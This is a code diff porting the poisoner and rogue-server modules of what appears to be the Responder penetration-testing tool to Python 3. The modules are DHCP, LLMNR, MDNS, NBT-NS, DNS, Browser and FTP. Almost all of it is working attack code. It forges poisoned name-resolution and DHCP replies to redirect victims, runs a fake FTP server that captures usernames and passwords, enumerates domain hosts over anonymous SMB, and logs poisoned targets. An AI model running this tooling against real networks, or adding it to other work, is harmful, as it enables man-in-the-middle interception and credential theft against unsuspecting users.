+        self.fields["Op6Str"]   = socket.inet_aton(DNSIP).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1')
+        self.fields["Op15Str"]  = DNSNAME
+        self.fields["Op252Str"] = WPADSRV
+        self.fields["Op15Len"]  = StructWithLenPython2or3(">b",len(str(self.fields["Op15Str"])))
+        self.fields["Op252Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op252Str"])))
+
+def RespondToThisIP(ClientIp):
+    if ClientIp.startswith('127.0.0.'):
+        return False
+    elif RespondTo and ClientIp not in RespondTo:
+        return False
+    elif ClientIp in RespondTo or RespondTo == []:
+        if ClientIp not in DontRespondTo:
+            return True
+    return False
+
+def ParseSrcDSTAddr(data):
+    SrcIP = socket.inet_ntoa(data[0][26:30])
+    DstIP = socket.inet_ntoa(data[0][30:34])
+    SrcPort = struct.unpack('>H',data[0][34:36])[0]
+    DstPort = struct.unpack('>H',data[0][36:38])[0]
+    return SrcIP, SrcPort, DstIP, DstPort
+
+def FindIP(data):
+    data = data.decode('latin-1')
+    IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data))
+    return ''.join(IP[0:4]).encode('latin-1')
+
+def ParseDHCPCode(data, ClientIP):
+    global DHCPClient
+    global ROUTERIP
+    PTid        = data[4:8]
+    Seconds     = data[8:10]
+    CurrentIP   = socket.inet_ntoa(data[12:16])
+    RequestedIP = socket.inet_ntoa(data[16:20])
+    MacAddr     = data[28:34]
+    MacAddrStr  = ':'.join('%02x' % ord(m) for m in MacAddr.decode('latin-1')).upper()
+    OpCode      = data[242:243]
+    RequestIP   = data[245:249]
+    
+    if DHCPClient.count(MacAddrStr) >= 4:
+    	return "'%s' has been poisoned more than 4 times. Ignoring..." % MacAddrStr
+    	
+    if OpCode == b"\x02" and Respond_To_Requests:  # DHCP Offer
+        ROUTERIP = ClientIP
+        return 'Found DHCP server IP: %s, now waiting for incoming requests...' % (ROUTERIP)
+
+    elif OpCode == b"\x03" and Respond_To_Requests:  # DHCP Request
+        IP = FindIP(data)
+        if IP:
+            IPConv = socket.inet_ntoa(IP)
+            if RespondToThisIP(IPConv):
+                IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1'))
+                Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), ElapsedSec=Seconds.decode('latin-1'))
+                Packet.calculate()
+                Buffer = UDP(Data = Packet)
+                Buffer.calculate()
+                SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
+                DHCPClient.append(MacAddrStr)
+                return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr)
+
+    elif OpCode == b"\x01" and Respond_To_Requests:  # DHCP Discover
+        IP = FindIP(data)
+        if IP:
+            IPConv = socket.inet_ntoa(IP)
+            if RespondToThisIP(IPConv):
+                IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1'))
+                Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), DHCPOpCode="\x02", ElapsedSec=Seconds.decode('latin-1'))
+                Packet.calculate()
+                Buffer = UDP(Data = Packet)
+                Buffer.calculate()
+                SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
+                DHCPClient.append(MacAddrStr)
+                return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr)
+
+def SendDiscover():
+	s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
+	s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
+	IP_Header = IPHead(SrcIP = socket.inet_aton('0.0.0.0').decode('latin-1'), DstIP=socket.inet_aton('255.255.255.255').decode('latin-1'))
+	Packet = DHCPDiscover()
+	Packet.calculate()
+	Buffer = UDP(SrcPort="\x00\x44", DstPort="\x00\x43",Data = Packet)
+	Buffer.calculate()
+	s.sendto(NetworkSendBufferPython2or3(str(IP_Header)+str(Buffer)), ('255.255.255.255', 67))
+
+def SendDHCP(packet,Host):
+	s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
+	s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
+	s.sendto(NetworkSendBufferPython2or3(packet), Host)
+
+def DHCP():
+    s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
+    s.bind((Interface, 0x0800))
+    SendDiscover()
+    while True:
+            data = s.recvfrom(65535)
+            if data[0][23:24] == b"\x11":# is udp?
+                SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
+                if SrcPort == 67 or DstPort == 67:
+                    ClientIP = socket.inet_ntoa(data[0][26:30])
+                    ret = ParseDHCPCode(data[0][42:], ClientIP)
+                    if ret:
+                        print(text("[*] [DHCP] %s" % ret))
--- a/poisoners/LLMNR.py
+++ b/poisoners/LLMNR.py
@@ -14,32 +14,42 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import struct
-import fingerprint

+import fingerprint
 from packets import LLMNR_Ans
-from SocketServer import BaseRequestHandler
 from utils import *

+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
+
+

 def Parse_LLMNR_Name(data):
-	NameLen = struct.unpack('>B',data[12])[0]
-	return data[13:13+NameLen]
-
+	import codecs
+	NameLen = data[12]
+	if (sys.version_info > (3, 0)):
+		return data[13:13+NameLen]
+	else:
+		NameLen2 = int(codecs.encode(NameLen, 'hex'), 16)
+		return data[13:13+int(NameLen2)]

 def IsICMPRedirectPlausible(IP):
 	dnsip = []
-	for line in file('/etc/resolv.conf', 'r'):
-		ip = line.split()
-		if len(ip) < 2:
-		   continue
-		elif ip[0] == 'nameserver':
-			dnsip.extend(ip[1:])
-	for x in dnsip:
-		if x != "127.0.0.1" and IsOnTheSameSubnet(x,IP) is False:
-			print color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5)
-			print color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5)
-			print color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5)
+	with open('/etc/resolv.conf', 'r') as file:
+		for line in file:
+			ip = line.split()
+			if len(ip) < 2:
+		   		continue
+			elif ip[0] == 'nameserver':
+				dnsip.extend(ip[1:])
+		for x in dnsip:
+			if x != "127.0.0.1" and IsOnTheSameSubnet(x,IP) is False:
+				print(color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5))
+				print(color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5))
+				print(color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5))

 if settings.Config.AnalyzeMode:
 	IsICMPRedirectPlausible(settings.Config.Bind_To)
@@ -47,28 +57,40 @@ if settings.Config.AnalyzeMode:

 class LLMNR(BaseRequestHandler):  # LLMNR Server class
 	def handle(self):
-		data, soc = self.request
-		Name = Parse_LLMNR_Name(data)
-
-		# Break out if we don't want to respond to this host
-		if RespondToThisHost(self.client_address[0], Name) is not True:
-			return None
-
-		if data[2:4] == "\x00\x00" and Parse_IPV6_Addr(data):
-			Finger = None
-			if settings.Config.Finger_On_Off:
-				Finger = fingerprint.RunSmbFinger((self.client_address[0], 445))
-
-			if settings.Config.AnalyzeMode:
-				LineHeader = "[Analyze mode: LLMNR]"
-				print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
-			else:  # Poisoning Mode
-				Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name)
-				Buffer.calculate()
-				soc.sendto(str(Buffer), self.client_address)
-				LineHeader = "[*] [LLMNR]"
-				print color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0], Name), 2, 1)
-
-			if Finger is not None:
-				print text("[FINGER] OS Version     : %s" % color(Finger[0], 3))
-				print text("[FINGER] Client Version : %s" % color(Finger[1], 3))
+		try:
+			data, soc = self.request
+			Name = Parse_LLMNR_Name(data).decode("latin-1")
+			# Break out if we don't want to respond to this host
+			if RespondToThisHost(self.client_address[0], Name) is not True:
+				return None
+			if data[2:4] == b'\x00\x00' and Parse_IPV6_Addr(data):
+				Finger = None
+				if settings.Config.Finger_On_Off:
+					Finger = fingerprint.RunSmbFinger((self.client_address[0], 445))
+	
+				if settings.Config.AnalyzeMode:
+					LineHeader = "[Analyze mode: LLMNR]"
+					print(color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1))
+					SavePoisonersToDb({
+							'Poisoner': 'LLMNR', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '1',
+							})
+				else:  # Poisoning Mode
+					Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
+					Buffer1.calculate()
+					soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
+					LineHeader = "[*] [LLMNR]"
+					print(color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0], Name), 2, 1))
+					SavePoisonersToDb({
+							'Poisoner': 'LLMNR', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '0',
+							})
+				if Finger is not None:
+					print(text("[FINGER] OS Version     : %s" % color(Finger[0], 3)))
+					print(text("[FINGER] Client Version : %s" % color(Finger[1], 3)))
+		except:
+			raise
--- a/poisoners/MDNS.py
+++ b/poisoners/MDNS.py
@@ -15,28 +15,40 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import struct
-
-from SocketServer import BaseRequestHandler
+import sys
+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 from packets import MDNS_Ans
 from utils import *

 def Parse_MDNS_Name(data):
 	try:
-		data = data[12:]
-		NameLen = struct.unpack('>B',data[0])[0]
-		Name = data[1:1+NameLen]
-		NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
-		Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
-		return Name+'.'+Name_
+		if (sys.version_info > (3, 0)):
+			data = data[12:]
+			NameLen = data[0]
+			Name = data[1:1+NameLen]
+			NameLen_ = data[1+NameLen]
+			Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
+			FinalName = Name+b'.'+Name_
+			return FinalName.decode("latin-1")
+		else:
+			data = NetworkRecvBufferPython2or3(data[12:])
+			NameLen = struct.unpack('>B',data[0])[0]
+			Name = data[1:1+NameLen]
+			NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
+			Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
+			return Name+'.'+Name_
+
 	except IndexError:
 		return None


 def Poisoned_MDNS_Name(data):
-	data = data[12:]
+	data = NetworkRecvBufferPython2or3(data[12:])
 	return data[:len(data)-5]

-
 class MDNS(BaseRequestHandler):
 	def handle(self):
 		MADDR = "224.0.0.251"
@@ -51,13 +63,25 @@ class MDNS(BaseRequestHandler):

 		if settings.Config.AnalyzeMode:  # Analyze Mode
 			if Parse_IPV6_Addr(data):
-				print text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0], 3), color(Request_Name, 3)))
+				print(text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0], 3), color(Request_Name, 3))))
+				SavePoisonersToDb({
+							'Poisoner': 'MDNS', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Request_Name,
+							'AnalyzeMode': '1',
+						})
 		else:  # Poisoning Mode
 			if Parse_IPV6_Addr(data):

 				Poisoned_Name = Poisoned_MDNS_Name(data)
-				Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=socket.inet_aton(settings.Config.Bind_To))
+				Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=RespondWithIPAton())
 				Buffer.calculate()
-				soc.sendto(str(Buffer), (MADDR, MPORT))
+				soc.sendto(NetworkSendBufferPython2or3(Buffer), (MADDR, MPORT))

-				print color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name), 2, 1)
+				print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name), 2, 1))
+				SavePoisonersToDb({
+							'Poisoner': 'MDNS', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Request_Name,
+							'AnalyzeMode': '0',
+						})
--- a/poisoners/NBTNS.py
+++ b/poisoners/NBTNS.py
@@ -15,22 +15,27 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import fingerprint
-
+import sys
 from packets import NBT_Ans
-from SocketServer import BaseRequestHandler
 from utils import *

+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
 # Define what are we answering to.
 def Validate_NBT_NS(data):
+	print("NBT-Service is:", NetworkRecvBufferPython2or3(data[43:46]))
 	if settings.Config.AnalyzeMode:
 		return False
-	elif NBT_NS_Role(data[43:46]) == "File Server":
+	elif NBT_NS_Role(NetworkRecvBufferPython2or3(data[43:46])) == "File Server":
 		return True
 	elif settings.Config.NBTNSDomain:
-		if NBT_NS_Role(data[43:46]) == "Domain Controller":
+		if NBT_NS_Role(NetworkRecvBufferPython2or3(data[43:46])) == "Domain Controller":
 			return True
 	elif settings.Config.Wredirect:
-		if NBT_NS_Role(data[43:46]) == "Workstation/Redirector":
+		if NBT_NS_Role(NetworkRecvBufferPython2or3(data[43:46])) == "Workstation/Redirector":
 			return True
 	return False

@@ -40,28 +45,38 @@ class NBTNS(BaseRequestHandler):
 	def handle(self):

 		data, socket = self.request
-		Name = Decode_Name(data[13:45])
-
+		Name = Decode_Name(NetworkRecvBufferPython2or3(data[13:45]))
 		# Break out if we don't want to respond to this host
 		if RespondToThisHost(self.client_address[0], Name) is not True:
 			return None

-		if data[2:4] == "\x01\x10":
+		if data[2:4] == b'\x01\x10':
 			Finger = None
 			if settings.Config.Finger_On_Off:
 				Finger = fingerprint.RunSmbFinger((self.client_address[0],445))

 			if settings.Config.AnalyzeMode:  # Analyze Mode
 				LineHeader = "[Analyze mode: NBT-NS]"
-				print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
+				print(color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1))
+				SavePoisonersToDb({
+							'Poisoner': 'NBT-NS', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '1',
+						})
 			else:  # Poisoning Mode
-				Buffer = NBT_Ans()
-				Buffer.calculate(data)
-				socket.sendto(str(Buffer), self.client_address)
+				Buffer1 = NBT_Ans()
+				Buffer1.calculate(data)
+				socket.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
 				LineHeader = "[*] [NBT-NS]"
-
-				print color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0], Name, NBT_NS_Role(data[43:46])), 2, 1)
+				print(color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0], Name, NBT_NS_Role(NetworkRecvBufferPython2or3(data[43:46]))), 2, 1))
+				SavePoisonersToDb({
+							'Poisoner': 'NBT-NS', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '0',
+						})

 			if Finger is not None:
-				print text("[FINGER] OS Version     : %s" % color(Finger[0], 3))
-				print text("[FINGER] Client Version : %s" % color(Finger[1], 3))
+				print(text("[FINGER] OS Version     : %s" % color(Finger[0], 3)))
+				print(text("[FINGER] Client Version : %s" % color(Finger[1], 3)))
--- a/servers/Browser.py
+++ b/servers/Browser.py
@@ -14,40 +14,43 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
-from SocketServer import BaseRequestHandler
 from utils import *
+from packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 import struct


 def WorkstationFingerPrint(data):
 	return {
-		"\x04\x00"    :"Windows 95",
-		"\x04\x10"    :"Windows 98",
-		"\x04\x90"    :"Windows ME",
-		"\x05\x00"    :"Windows 2000",
-		"\x05\x01"    :"Windows XP",
-		"\x05\x02"    :"Windows XP(64-Bit)/Windows 2003",
-		"\x06\x00"    :"Windows Vista/Server 2008",
-		"\x06\x01"    :"Windows 7/Server 2008R2",
-		"\x06\x02"    :"Windows 8/Server 2012",
-		"\x06\x03"    :"Windows 8.1/Server 2012R2",
-		"\x10\x00"    :"Windows 10/Server 2016",
-	}.get(data, 'Unknown')
+ 		b"\x04\x00"    :"Windows 95",
+		b"\x04\x0A"    :"Windows 98",
+		b"\x04\x5A"    :"Windows ME",
+ 		b"\x05\x00"    :"Windows 2000",
+ 		b"\x05\x01"    :"Windows XP",
+ 		b"\x05\x02"    :"Windows XP(64-Bit)/Windows 2003",
+ 		b"\x06\x00"    :"Windows Vista/Server 2008",
+ 		b"\x06\x01"    :"Windows 7/Server 2008R2",
+ 		b"\x06\x02"    :"Windows 8/Server 2012",
+ 		b"\x06\x03"    :"Windows 8.1/Server 2012R2",
+		b"\x0A\x00"    :"Windows 10/Server 2016",
+ 	}.get(data, 'Unknown')


 def RequestType(data):
 	return {
-		"\x01": 'Host Announcement',
-		"\x02": 'Request Announcement',
-		"\x08": 'Browser Election',
-		"\x09": 'Get Backup List Request',
-		"\x0a": 'Get Backup List Response',
-		"\x0b": 'Become Backup Browser',
-		"\x0c": 'Domain/Workgroup Announcement',
-		"\x0d": 'Master Announcement',
-		"\x0e": 'Reset Browser State Announcement',
-		"\x0f": 'Local Master Announcement',
+		b"\x01": 'Host Announcement',
+		b"\x02": 'Request Announcement',
+		b"\x08": 'Browser Election',
+		b"\x09": 'Get Backup List Request',
+		b"\x0a": 'Get Backup List Response',
+		b"\x0b": 'Become Backup Browser',
+		b"\x0c": 'Domain/Workgroup Announcement',
+		b"\x0d": 'Master Announcement',
+		b"\x0e": 'Reset Browser State Announcement',
+		b"\x0f": 'Local Master Announcement',
 	}.get(data, 'Unknown')


@@ -55,13 +58,13 @@ def PrintServerName(data, entries):
 	if entries <= 0:
 		return None
 	entrieslen = 26 * entries
-	chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries
+	chunks, chunk_size = len(data[:entrieslen]), entrieslen//entries
 	ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size)]

 	l = []
 	for x in ServerName:
 		fingerprint = WorkstationFingerPrint(x[16:18])
-		name = x[:16].replace('\x00', '')
+		name = x[:16].strip(b'\x00').decode('latin-1')
 		l.append('%s (%s)' % (name, fingerprint))
 	return l

@@ -70,24 +73,24 @@ def ParsePacket(Payload):
 	PayloadOffset = struct.unpack('<H',Payload[51:53])[0]
 	StatusCode = Payload[PayloadOffset-4:PayloadOffset-2]

-	if StatusCode == "\x00\x00":
+	if StatusCode == b'\x00\x00':
 		EntriesNum = struct.unpack('<H',Payload[PayloadOffset:PayloadOffset+2])[0]
 		return PrintServerName(Payload[PayloadOffset+4:], EntriesNum)
-	return None
+	return ''


 def RAPThisDomain(Client,Domain):		
 	PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80")
 	if PDC is not None:
-		print text("[LANMAN] Detected Domains: %s" % ', '.join(PDC))
+		print(text("[LANMAN] Detected Domains: %s" % ', '.join(PDC)))
 	
 	SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00")
 	if SQL is not None:
-		print text("[LANMAN] Detected SQL Servers on domain %s: %s" % (Domain, ', '.join(SQL)))
+		print(text("[LANMAN] Detected SQL Servers on domain %s: %s" % (Domain, ', '.join(SQL))))

 	WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
 	if WKST is not None:
-		print text("[LANMAN] Detected Workstations/Servers on domain %s: %s" % (Domain, ', '.join(WKST)))
+		print(text("[LANMAN] Detected Workstations/Servers on domain %s: %s" % (Domain, ', '.join(WKST))))


 def RapFinger(Host, Domain, Type):
@@ -101,49 +104,49 @@ def RapFinger(Host, Domain, Type):
 		Body.calculate()

 		Packet = str(Header)+str(Body)
-		Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
+		Buffer = StructPython2or3('>i', str(Packet))+str(Packet)#struct.pack(">i", len(''.join(Packet))) + Packet

-		s.send(Buffer)
+		s.send(NetworkSendBufferPython2or3(Buffer))
 		data = s.recv(1024)

 		# Session Setup AndX Request, Anonymous.
-		if data[8:10] == "\x72\x00":
+		if data[8:10] == b'\x72\x00':
 			Header = SMBHeader(cmd="\x73",mid="\x02\x00")
 			Body = SMBSessionData()
 			Body.calculate()

 			Packet = str(Header)+str(Body)
-			Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
+			Buffer = StructPython2or3('>i', str(Packet))+str(Packet)

-			s.send(Buffer)
+			s.send(NetworkSendBufferPython2or3(Buffer))
 			data = s.recv(1024)

 			# Tree Connect IPC$.
-			if data[8:10] == "\x73\x00":
-				Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34],mid="\x03\x00")
+			if data[8:10] == b'\x73\x00':
+				Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34].decode('latin-1'),mid="\x03\x00")
 				Body = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$")
 				Body.calculate()

 				Packet = str(Header)+str(Body)
-				Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
+				Buffer = StructPython2or3('>i', str(Packet))+str(Packet)

-				s.send(Buffer)
+				s.send(NetworkSendBufferPython2or3(Buffer))
 				data = s.recv(1024)

 				# Rap ServerEnum.
-				if data[8:10] == "\x75\x00":
-					Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x04\x00")
+				if data[8:10] == b'\x75\x00':
+					Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x04\x00")
 					Body = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain))
 					Body.calculate()

 					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
+					Buffer = StructPython2or3('>i', str(Packet))+str(Packet)

-					s.send(Buffer)
+					s.send(NetworkSendBufferPython2or3(Buffer))
 					data = s.recv(64736)

 					# Rap ServerEnum, Get answer and return what we're looking for.
-					if data[8:10] == "\x25\x00":
+					if data[8:10] == b'\x25\x00':
 						s.close()
 						return ParsePacket(data)
 	except:
@@ -162,8 +165,10 @@ def BecomeBackup(data,Client):
 			Role       = NBT_NS_Role(data[45:48])

 			if settings.Config.AnalyzeMode:
-				print text("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain))
-				print RAPThisDomain(Client, Domain)
+				print(text("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain)))
+				RAPInfo = RAPThisDomain(Client, Domain)
+				if RAPInfo is not None:
+					print(RAPInfo)

 	except:
 		pass
@@ -177,8 +182,10 @@ def ParseDatagramNBTNames(data,Client):

 	
 		if Role2 == "Domain Controller" or Role2 == "Browser Election" or Role2 == "Local Master Browser" and settings.Config.AnalyzeMode:
-			print text('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client, Name, Role1, Domain, Role2))
-			print RAPThisDomain(Client, Domain)
+			print(text('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client, Name, Role1, Domain, Role2)))
+			RAPInfo = RAPThisDomain(Client, Domain)
+			if RAPInfo is not None:
+				print(RAPInfo)
 	except:
 		pass

@@ -189,7 +196,7 @@ class Browser(BaseRequestHandler):
 			request, socket = self.request

 			if settings.Config.AnalyzeMode:
-				ParseDatagramNBTNames(request,self.client_address[0])
+				ParseDatagramNBTNames(NetworkRecvBufferPython2or3(request),self.client_address[0])
 				BecomeBackup(request,self.client_address[0])
 			BecomeBackup(request,self.client_address[0])

--- a/servers/DNS.py
+++ b/servers/DNS.py
@@ -14,34 +14,44 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from packets import DNS_Ans
-from SocketServer import BaseRequestHandler
 from utils import *
+from packets import DNS_Ans, DNS_SRV_Ans
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler

 def ParseDNSType(data):
 	QueryTypeClass = data[len(data)-4:]
-
 	# If Type A, Class IN, then answer.
-	return QueryTypeClass == "\x00\x01\x00\x01"
+	if QueryTypeClass == "\x00\x01\x00\x01":
+		return "A"
+	if QueryTypeClass == "\x00\x21\x00\x01":
+		return "SRV"



 class DNS(BaseRequestHandler):
 	def handle(self):
-		# Break out if we don't want to respond to this host
+		# Ditch it if we don't want to respond to this host
 		if RespondToThisIP(self.client_address[0]) is not True:
 			return None

 		try:
 			data, soc = self.request
-
-			if ParseDNSType(data) and settings.Config.AnalyzeMode == False:
+			if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "A" and settings.Config.AnalyzeMode == False:
 				buff = DNS_Ans()
-				buff.calculate(data)
-				soc.sendto(str(buff), self.client_address)
+				buff.calculate(NetworkRecvBufferPython2or3(data))
+				soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
+				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
+				print(color("[*] [DNS] A Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))

-				ResolveName = re.sub(r'[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print color("[*] [DNS] Poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1)
+			if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "SRV" and settings.Config.AnalyzeMode == False:
+				buff = DNS_SRV_Ans()
+				buff.calculate(NetworkRecvBufferPython2or3(data))
+				soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
+				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
+				print(color("[*] [DNS] SRV Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))

 		except Exception:
 			pass
@@ -55,14 +65,19 @@ class DNSTCP(BaseRequestHandler):
 	
 		try:
 			data = self.request.recv(1024)
-
-			if ParseDNSType(data) and settings.Config.AnalyzeMode is False:
+			if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "A" and settings.Config.AnalyzeMode is False:
 				buff = DNS_Ans()
-				buff.calculate(data)
-				self.request.send(str(buff))
-
+				buff.calculate(NetworkRecvBufferPython2or3(data))
+				self.request.send(NetworkSendBufferPython2or3(buff))
 				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print color("[*] [DNS-TCP] Poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1)
+				print(color("[*] [DNS] A Record poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
+
+			if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "SRV" and settings.Config.AnalyzeMode == False:
+				buff = DNS_SRV_Ans()
+				buff.calculate(NetworkRecvBufferPython2or3(data))
+				self.request.send(NetworkSendBufferPython2or3(buff))
+				ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
+				print(color("[*] [DNS] SRV Record poisoned answer sent: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))

 		except Exception:
 			pass
--- a/servers/FTP.py
+++ b/servers/FTP.py
@@ -15,27 +15,31 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from utils import *
-from SocketServer import BaseRequestHandler
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
 from packets import FTPPacket

 class FTP(BaseRequestHandler):
 	def handle(self):
 		try:
-			self.request.send(str(FTPPacket()))
+			self.request.send(NetworkSendBufferPython2or3(FTPPacket()))
 			data = self.request.recv(1024)

-			if data[0:4] == "USER":
-				User = data[5:].strip()
+			if data[0:4] == b'USER':
+				User = data[5:].strip().decode("latin-1")

 				Packet = FTPPacket(Code="331",Message="User name okay, need password.")
-				self.request.send(str(Packet))
+				self.request.send(NetworkSendBufferPython2or3(Packet))
 				data = self.request.recv(1024)

-			if data[0:4] == "PASS":
-				Pass = data[5:].strip()
+			if data[0:4] == b'PASS':
+				Pass = data[5:].strip().decode("latin-1")

 				Packet = FTPPacket(Code="530",Message="User not logged in.")
-				self.request.send(str(Packet))
+				self.request.send(NetworkSendBufferPython2or3(Packet))
 				data = self.request.recv(1024)

 				SaveToDb({
